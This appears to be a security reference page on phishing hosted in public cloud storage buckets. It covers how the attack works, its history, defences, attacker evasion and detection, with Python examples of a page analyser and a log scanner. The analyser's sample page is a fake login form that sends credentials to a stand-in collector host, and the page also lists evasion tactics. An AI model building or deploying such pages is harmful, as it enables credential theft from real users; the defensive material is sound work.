Cloud Storage Phishing Hosting
Hosting phishing pages on trusted cloud storage (GCS, S3, Azure Blob) to bypass URL reputation filters; still active but detection improving.
MITRE ATT&CK: T1566.002
Timeline: The Cat and Mouse
2017 → Attack emerges → 2020 → Defenses improve → 2023 → Shifting to serverless → Present
The Evolution
| Phase | Period | What Happened |
|---|---|---|
| ATTACK | 2017 | GCS/S3-hosted phishing exploits trusted domain reputation |
| PEAK | 2018-2019 | Mass adoption; filters not inspecting bucket paths |
| RESPONSE | 2019 | Cloud providers add abuse scanning for public buckets |
|  | 2020 | SEGs add full-path URL inspection |
|  | 2022 | Real-time content analysis at delivery |
| DECLINE | 2023+ | Sophisticated attackers shift to Cloudflare Workers, compromised sites |
| CURRENT | Present | Still works with rapid rotation; detection significantly improved |
Key Events with Sources
| Date | Event | Significance | Source |
|---|---|---|---|
| 2017 | Cloud storage phishing emerges | Attackers discover googleapis.com bypasses URL filters | Proofpoint |
| 2019 | Azure Blob O365 phishing | Microsoft's own infrastructure hosting O365 phishing | Netskope |
| 2019 | Google Cloud abuse scanning | GCS adds automated phishing content detection | Google Cloud |
| 2020 | Full-path URL inspection | SEGs analyze bucket names and file patterns | Proofpoint |
| 2022 | Real-time content analysis | Advanced gateways fetch and analyze pages before delivery | Mimecast |
Overview
Attackers host phishing pages on legitimate cloud storage services instead of their own infrastructure. Victims see trusted domains like storage.googleapis.com in the URL, and security filters are reluctant to block major cloud providers entirely.
The Attack
How It Worked
- Attacker creates a cloud storage bucket (GCS, S3, Azure Blob) with public read access
- Uploads phishing HTML page mimicking target brand (Office 365, PayPal, banking, etc.)
- Sends phishing email with a link to storage.googleapis.com/[bucket-name]/login.html
- Victim sees a Google/Amazon/Microsoft domain, assumes it's safe
- Victim enters credentials, which POST to attacker-controlled server
- Attacker harvests credentials
Technical Details
Cloud storage services serve files with appropriate Content-Type headers based on file extension:
- .html → Content-Type: text/html → Browser renders as a web page
- .js → Content-Type: application/javascript → Browser executes
- .css → Content-Type: text/css → Browser applies styles
This means an attacker can host a fully functional phishing page, complete with JavaScript for form validation and credential exfiltration, on "trusted" infrastructure.
Example malicious URL:
https://storage.googleapis.com/hqyoqzatqthj/aemmfcylvxeo.html
The bucket name hqyoqzatqthj is random gibberish: a red flag if you know to look for it, but invisible to users who only see "googleapis.com".
Why It Worked
- Domain reputation: URL filters scored googleapis.com as trusted
- User trust: Users trained to "look for HTTPS" saw a valid Google certificate
- Blocking difficulty: Can't block cloud storage wholesale without breaking legitimate use
- Anonymity: Easy to spin up, no infrastructure to trace
- Speed: New bucket in seconds, campaign running in minutes
Notable Campaigns
- Office 365 Phishing Wave (2019): Massive campaign using Azure Blob storage; Microsoft's own infrastructure hosting O365 phishing
- COVID-19 Lures (2020): Health organization spoofs hosted on GCS during the pandemic
- Banking Campaigns (Ongoing): Persistent abuse across all major cloud providers
How The Defenses Work
Cloud Provider Abuse Scanning (2019+)
Cloud providers scan uploaded content for phishing patterns:
- Known brand logos (Microsoft, PayPal, banks)
- Credential harvesting forms
- Suspicious JavaScript patterns
Malicious buckets get flagged and taken down, though often hours after the campaign started.
Full-Path URL Inspection (2020+)
Instead of just asking "is googleapis.com safe?", security tools now analyze:
- Is the bucket name random gibberish?
- Does the path contain login.html, verify.html, secure.html?
- Does the HTML contain login forms for brands the bucket owner doesn't control?
Real-Time Content Analysis (2022+)
Advanced Secure Email Gateways fetch the destination URL at scan time and analyze:
- Page content and structure
- Form actions (where do credentials POST?)
- Brand impersonation signals
- Behavioral patterns (redirects, JavaScript obfuscation)
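As an added example, not code from this page's sources or any gateway vendor, the following Python shows the kind of check behind both the provider-side abuse scanning and the gateway real-time content analysis described above: it parses a fetched page, finds forms that collect a password, resolves where they POST, and looks for brand names and client-side decoding. The sample page, the bucket name, the collector hostname (collector.example.invalid) and the brand keyword list are all constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample: a credential-harvesting page as it might be served from a
# public bucket. Bucket, hosts and the base64 blob are made up for this example.
SAMPLE_PAGE_URL = "https://storage.googleapis.com/example-bucket-placeholder/login.html"
SAMPLE_HTML = """
<html><head><title>Sign in to your account - Office 365</title></head>
<body>
<form method="post" action="https://collector.example.invalid/post.php">
  <input type="email" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Sign in">
</form>
<script>document.write(atob("PGRpdj5Mb2FkaW5nPC9kaXY+"));</script>
</body></html>
"""

# Assumed lists; a real scanner would carry far larger brand and signature sets.
BRAND_KEYWORDS = ("office 365", "microsoft", "paypal", "outlook", "onedrive")
CLOUD_STORAGE_SUFFIXES = ("googleapis.com", "amazonaws.com", "blob.core.windows.net")
DECODER_HINTS = ("atob(", "unescape(", "document.write(")


class PageCollector(HTMLParser):
    """Collect forms (action + password input), title, meta refreshes and script hints."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.title = ""
        self.meta_refresh = []
        self.script_hints = []
        self._form = None
        self._in_title = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases attribute names for us
        if tag == "form":
            self._form = {"action": a.get("action") or "", "has_password": False}
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "").lower() == "password":
                self._form["has_password"] = True
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.meta_refresh.append(a.get("content") or "")
        elif tag == "title":
            self._in_title = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None
        elif tag == "title":
            self._in_title = False
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        elif self._in_script and any(h in data for h in DECODER_HINTS):
            self.script_hints.append(data.strip()[:80])


def analyze_page(page_url, html):
    """Return title, forms and a list of findings for a fetched page."""
    parser = PageCollector()
    parser.feed(html)
    host = (urlparse(page_url).hostname or "").lower()
    findings = []
    for form in parser.forms:
        # A relative action resolves back to the bucket; an absolute one may go elsewhere.
        action_url = urljoin(page_url, form["action"]) if form["action"] else page_url
        action_host = (urlparse(action_url).hostname or "").lower()
        if form["has_password"]:
            findings.append("password form present")
            if action_host != host:
                findings.append(f"credentials POST off-host to {action_host}")
    brands = [b for b in BRAND_KEYWORDS if b in parser.title.lower()]
    if brands and host.endswith(CLOUD_STORAGE_SUFFIXES):
        findings.append(f"brand impersonation: {', '.join(brands)} on {host}")
    if parser.meta_refresh:
        findings.append(f"meta refresh redirect: {parser.meta_refresh[0]}")
    if parser.script_hints:
        findings.append("client-side decoding (atob/unescape/document.write) in script")
    return {"title": parser.title.strip(), "forms": parser.forms, "findings": findings}


if __name__ == "__main__":
    for finding in analyze_page(SAMPLE_PAGE_URL, SAMPLE_HTML)["findings"]:
        print(finding)
```

The off-host check is the one that matters most in practice: a static bucket cannot process the POST itself, so a password form whose action leaves the hosting domain is exactly the "where do credentials POST?" signal listed above. A legitimate document or media page served from the same bucket yields no findings.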
Attacker Adaptation
Attackers evolved several counter-techniques:
| Evasion | Description |
|---|---|
| Rapid rotation | Use bucket for hours, abandon before takedown |
| Legitimate-sounding names | microsoft-support-docs instead of xj7yhq9 |
| Redirect chains | Cloud storage redirects to actual phishing page elsewhere |
| Cloaking | Serve different content to security scanners vs. real users |
| Encrypted/obfuscated content | Base64-encoded pages that decode client-side |
Sophisticated attackers have largely moved to more evasive hosting:
- Cloudflare Workers: Serverless functions, even harder to inspect
- Compromised legitimate sites: Real business domains with good reputation
- URL shorteners: Hide the destination entirely
Current State
Status: 🟡 Limited Effectiveness
Still seen regularly in the wild, but detection has improved significantly. Success factors:
| Works When | Fails When |
|---|---|
| Attacker uses believable bucket names | Random gibberish bucket names |
| Campaign is short-lived (hours) | Campaign runs for days |
| Target org has basic email filtering | Target has advanced URL analysis |
| Target users aren't security-aware | Users trained to inspect URLs |
Detection Guidance
Email Indicators
Look for emails containing:
- storage.googleapis.com URLs
- s3.amazonaws.com URLs
- blob.core.windows.net URLs
- Any cloud storage URL pointing to .html files
URL Red Flags
- Bucket names that are random strings
- Bucket names that don't match the claimed sender
- Cloud storage hosting HTML (legitimate use is typically media/documents)
- Query parameters with tracking tokens or encoded data
User Reports
Train users to report:
- âLogin pagesâ hosted on cloud storage
- Brand impersonation on Google/Amazon/Microsoft domains
- Emails from unknown senders with cloud storage links
SIEM Queries
If you're ingesting email logs, alert on:
url.domain:("storage.googleapis.com" OR "s3.amazonaws.com" OR "blob.core.windows.net")
AND url.path:*.html
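The SIEM query above matches on domain and extension only. As an added example (not code from this page's sources or any SIEM product), the following Python carries the Full-Path URL Inspection and URL Red Flags sections through as a scanner over email-log lines: it recognises path-style and virtual-hosted GCS, S3 and Azure Blob URL forms, extracts the attacker-chosen bucket or account name, and scores HTML objects, random-looking names, brand names that don't match the sender domain, and query strings. The JSON log format, the sender addresses, the brand list, the vowel-ratio randomness heuristic and the alert threshold are assumptions; the first two URLs reuse names quoted earlier on this page, the rest are constructed.

```python
import json
import re
from urllib.parse import urlparse

# Constructed email-log events (JSON, one per line). Senders and the third and
# fourth URLs are made up; the first two URLs reuse names quoted in the text above.
SAMPLE_LOG_LINES = [
    '{"sender": "alerts@example.invalid", "url": "https://storage.googleapis.com/hqyoqzatqthj/aemmfcylvxeo.html"}',
    '{"sender": "it@example.invalid", "url": "https://microsoft-support-docs.s3.amazonaws.com/verify.html"}',
    '{"sender": "hr@example.invalid", "url": "https://contosostorage.blob.core.windows.net/handbook/policy.pdf"}',
    '{"sender": "news@example.invalid", "url": "https://www.example.invalid/newsletter/index.html"}',
]

# Assumed brand list; a production rule set would be far larger.
BRANDS = ("microsoft", "office", "paypal", "google", "amazon", "docusign")
HTML_EXT = (".html", ".htm")
VOWELS = set("aeiou")


def classify_storage_url(url):
    """Return (provider, attacker-chosen name, path) for GCS, S3 and Azure Blob
    URL forms, or None when the host is not a cloud object store. Both path-style
    (storage.googleapis.com/bucket/...) and virtual-hosted
    (bucket.storage.googleapis.com/...) forms are recognised."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    segments = [s for s in p.path.split("/") if s]
    first = segments[0] if segments else ""
    if host == "storage.googleapis.com":
        return ("gcs", first, p.path)
    if host.endswith(".storage.googleapis.com"):
        return ("gcs", host[: -len(".storage.googleapis.com")], p.path)
    if re.fullmatch(r"s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com", host):
        return ("s3", first, p.path)
    m = re.fullmatch(r"(.+)\.s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com", host)
    if m:
        return ("s3", m.group(1), p.path)
    if host.endswith(".blob.core.windows.net"):
        # For Azure the storage-account label is the attacker-chosen name.
        return ("azure", host[: -len(".blob.core.windows.net")], p.path)
    return None


def looks_random(name):
    """Heuristic: generated names tend to be vowel-poor with long consonant runs."""
    letters = [c for c in name.lower() if c.isalpha()]
    if len(letters) < 6:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    runs = re.findall(r"[b-df-hj-np-tv-z]+", name.lower()) or [""]
    return vowel_ratio < 0.25 or max(len(r) for r in runs) >= 5


def score_url(url, sender):
    """Score one cloud-storage URL; None if the URL is not on a cloud object store."""
    info = classify_storage_url(url)
    if info is None:
        return None
    provider, bucket, path = info
    score, reasons = 0, []
    if path.lower().endswith(HTML_EXT):
        score += 2
        reasons.append("HTML served from object storage")
    if looks_random(bucket):
        score += 2
        reasons.append(f"random-looking name '{bucket}'")
    sender_domain = sender.rsplit("@", 1)[-1].lower()
    claimed = [b for b in BRANDS if b in bucket.lower()]
    if claimed and not any(b in sender_domain for b in claimed):
        score += 1
        reasons.append(f"name claims {claimed} but sender domain is {sender_domain}")
    if urlparse(url).query:
        score += 1
        reasons.append("query parameters on a static object")
    return {"provider": provider, "bucket": bucket, "score": score, "reasons": reasons}


def scan_log(lines, threshold=3):
    """Return alert records for events whose URL scores at or above the threshold."""
    alerts = []
    for line in lines:
        event = json.loads(line)
        result = score_url(event["url"], event["sender"])
        if result and result["score"] >= threshold:
            alerts.append({"url": event["url"], **result})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG_LINES):
        print(alert["score"], alert["url"], "; ".join(alert["reasons"]))
```

Of the four constructed events, the gibberish GCS bucket and the brand-named S3 bucket both serve HTML and cross the threshold; the Azure PDF and the non-storage newsletter link do not. The vowel-ratio heuristic will also flag short legitimate names like xyz-cdn, which is why it contributes to a score rather than alerting on its own.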
What Killed It (or Weakened It)
| Defense | Introduced | Impact |
|---|---|---|
| Cloud Provider Abuse Scanning | 2019 | Automated detection of phishing content in public buckets |
| Full-Path URL Inspection | 2020 | SEGs analyze bucket names and file patterns, not just domain |
| Real-Time Content Analysis | 2022 | Fetch and analyze page content before email delivery |